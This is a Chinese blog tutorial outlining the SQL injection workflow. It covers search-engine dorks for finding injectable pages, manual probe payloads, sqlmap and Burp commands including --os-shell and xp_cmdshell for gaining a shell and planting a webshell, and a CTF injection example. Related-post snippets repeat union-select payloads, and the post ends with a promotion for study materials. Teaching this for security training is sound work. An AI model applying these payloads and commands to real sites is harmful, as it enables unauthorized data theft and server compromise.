SQL注入-SQL注入基础-SQL注入流程

于 2024-08-26 15:56:05 发布
阅读量560 收藏 10
点赞数 10
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79614903/article/details/141566325
版权
SQL注入流程
01 寻找SQL注入点
寻找SQL注入点

无特定目标: inurl:.php?id=

有特定目标: inurl:.php?id=site:target.com // jsp sid

工具爬取: spider,对搜索引擎和目标网站的链接进行爬取

注入识别 手工简单识别:

代码语言:javascript

复制

'
and 1=1 / and 1=2
and '1'='1 / and '1'='2 
and 1 like 1 / and 1 like 2

工具识别:

代码语言:javascript

复制

sqlmap -m filename (filename中保存检测目标)
sqlmap --crawl(sqlmap对目标网站进行爬取,然后依次进行测试)

高级识别: 扩展识别广度和深度:

代码语言:javascript

复制

SqlMap --level 增加测试级别,对header中相关参数也进行测试
sqlmap -r filename (filename中为网站请求数据)

利用工具提高识别效率:

代码语言:javascript

复制

BurpSuite + SqlMap
BurpSuite拦截所有浏览器访问提交的数据
BurpSuite扩展插件,直接调用SqlMap进行测试

一些Tips:

可以在参数后键入“*” 来确定想要测试的参数 可能出现注入的点:新闻、登录、搜索、留言… … 站在开发的角度去寻找

代码语言:javascript

复制

python sqlmap.py -r 1.txt

burp sqlmap 扩展 Burp-> Extender->BApp Store -> SQLiPy Sqlmap

代码审计

搜索关键代码和函数 梳理业务流程

强网杯WEB “python is the best language”

代码语言:javascript

复制

http://test.com/register  
POST:  

username=test&email=t@t.com&password=123&password2=123&submit=Register  
username=test&email=t@t.com' and '1' = '1&password=123&password2=123&submit=Register
02 SQL注入流程

数据获取

代码语言:javascript

复制

web.mdb

select [*] from admin
select [*] from system

select [username] from system
select [name] from system

提权

代码语言:javascript

复制

xp.cmdshell

--os-shell // 执行系统命令 写webshell到网站目录

网络安全学习资源推荐

最后给大家分享一份全套的网络安全学习籽料,给那些想学习,想转行网络安全的同学一点点帮助!

对于从来没有学习过网络安全的同学,我们帮你准备了一份详细的从入门到就业的学习路线图!我们公司几位大佬花了几天时间做出来的学习路线图,跟着这个学习,保证没问题!

同学们有需要的话可以v扫描下方二维码联系领取~

零基础入门

1.学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

2.学习视频

从基础到进阶都有学习视频提供

3.学习书籍推荐(PDF)

4.面试资料

因篇幅有限,籽料较为敏感仅展示部分籽料,添加上方即可获取↑

 

网络安全渗透丫
关注
SQL注入步骤
Qianzshuo的博客
03-20 2034
1、寻找注入点 寻找url中存在?能够传递参数到后端的页面; 例如 news_detail.php?id=2 2、判断是否存在SQL漏洞 判断标准:就是前端输入恶意的SQL内容,能够带到后端数据库执行; 逻辑操作: select * from zeeker where id=2 and 1=1; 结果:可以查出数据 select * from zeeker where id=2 and 1=2; 结果:不可以查出数据 (判断闭合方式忽略) 3、判断当前查询的表有多少列 order by 列数,6报错,5不报
Sql注入流程
weixin_45837672的博客
07-20 2634
Sql注入本质是把用户输入都数据当做代码来执行,最终达到欺骗服务器执行恶意的SQL命令。
SQL注入-01】SQL语句基础SQL注入漏洞原理及分类
m0_64378913的博客
04-23 5781
目录1 SQL注入概述1.1 SQL注入简介1.2 SQL注入原理(掌握)1.3 SQL注入漏洞的危害(掌握)2 SQL注入漏洞分类2.1 注入位置分类(掌握)2.2 注入数据类型分类(掌握)2.3 注入手法分类(掌握)3 SQL语句基础3.1 简介3.2 注释3.3 MySQL数据库 information_schema 内容简介3.4 MySQL 常用函数4 总结参考文献 1 SQL注入概述 1.1 SQL注入简介 定义:SQL注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传
sql注入一般流程(附例题)
热门推荐
Battery的博客
08-03 14万+
在与服务器数据库进行数据交互的地方拼接了恶意的sql代码,达到欺骗服务器执行恶意代码的目的。本质上是程序把用户输入的数据当成了sql语句执行。
sql注入流程
qq_40753178的博客
01-23 322
sql注入流程 联合查询: 查闭合id=1’ and 1=1 id=1’ and 1=2 查列数 http://127.0.0.1/shouke.php?id=1") order by 4 # 显示位 http://127.0.0.1/shouke.php?id=1") and 1=2 union select 1,2,3,4 # 查数据库名 http://127.0.0.1/shouke...
sql注入详细过程
qq_42890862的博客
06-30 5976
mysql mysql5.0以上版本包含内置的information_schema数据库,它储存着mysql所有的数据库和表结构信息,利用该数据库可以查询到所有的数据库和表的内容 5.0 暴力破解的方式获取数据 1.原理 当我们的Web app在向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 2.sql手工注入的基本思路 (1)找到注入点 在我们可控的输入部分加一些符号,查看页
SQL注入的详细过程
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
02-21 1371
SQL注入详细过程:SQL注入的详细过程第一步:SQL注入点探测。探测SQL注入点是关键的第一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。通常只要带有输入提交的动态网页,并且动态网页访问数据库,就可能存在SQL注入漏洞。如果程序员信息安全意识不强,采用动态构造SQL语句访问数据库,并且对用户输入未进行有效验证,则存在SQL注入漏洞的可能性很大。一般通过页面的报错信息来确定是否存在SQL注入漏洞。 SQL注入的详细过程第二步:收集后台数据库信息。不同数据库的注入方法、函数都不尽相同,因此在
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
SQL注入-概述-ppt.pptx
10-27
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)进行数据存储和检索的Web应用程序。这种攻击方式利用了程序设计中的漏洞,使得恶意用户能够通过输入特定的SQL代码,来操纵数据库,获取未经授权...
五分钟快速搞懂什么是SQL注入-SQL注入详解(干货满满)
03-28
sql注入### 内容概要 本文是一篇关于SQL注入的详解,专为初学者设计。文章以通俗易懂的语言和幽默感,介绍了SQL注入的概念、防范方法、实际案例等。通过生动的例子和简单的故事,读者可以快速上手SQL注入,并在实际...
SQL注入的方法步骤
11-26
SQL注入的方法步骤 PDF格式的 不是很全
网络安全-sql注入-sqlmap
最新发布
09-02
网络安全-sql注入-sqlmap
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
SQL 注入攻击与防御 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者通过构造特殊的 SQL 语句来访问、修改或控制数据库中的数据。下面我们将详细介绍 SQL 注入的攻击方式、防御方法和相关工具。 一、SQL 注入攻击...
SQL注入流程(联合注入)
qq_64395221的博客
05-17 1486
但是并没有获取到数据,因为当id=1时,查询正常,但只取出了第一列数据;要想第一列取不出数据---要么id特别大,要么id是-1;通过上面的方法,我们已经知道列数了,但是上述方法都需要我们逃逸出单引号,如果没有逃逸出来,mysql会将单引号内当成一个整体,就不会执行后面的命令了。同理空格也需要编码--- %20 (--+也可以;id=-1' union select 1,database(),3--+ 获取到当前数据库。要知道数据库信息,我们可以通过联合查询找到我们想要的信息,但是联合查询。
SQL注入的基本步骤
qq_41679358的博客
07-27 2178
GET类型 1.判断是字符型还是数字型 ​ 2-1 2.通过报错判断闭合符 ​ " ’ ​ ‘’ LIMIT 0,1 3.确认查询的字段数量 ​ order by 3 4.确认占位信息 ​ union select 1,2,3 --+ 5.爆库名 ​ union select 1,2,database() --+ 6.爆表名 ​ union select 1,2,group_concat(table_name) from information_schema.tables where table_schem
SQL注入基本步骤
weixin_54535828的博客
04-05 6588
一、判断是否可以注入,是何种注入类型(整型,字符型) 举例、 http://xxx/xxx/Less-1/ 输入?id=1 and 1=1 --+正常,输入?id=1 and 1=2 --+报错,可判断为整型注入。 输入?id=1’出现报错,输入?id=1’‘正常,可判断为字符型注入。 总结: 单引号是用来猜测是否存在字符型注入,不加就是猜测是否存在整型注入。 二、判断查询返回了多少个列 判断完整型还是字符型后,去判断有多少列,当输入的列数超过它本来的就会出现报错。 举例、 id=1’ order by 3
sql注入步骤
weixin_48266255的博客
08-27 144
SQL注入 因为有时少打一个字母导致注入语句失效 所以记录以便复制。
SQL注入实战:sqli-labs实验详解
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值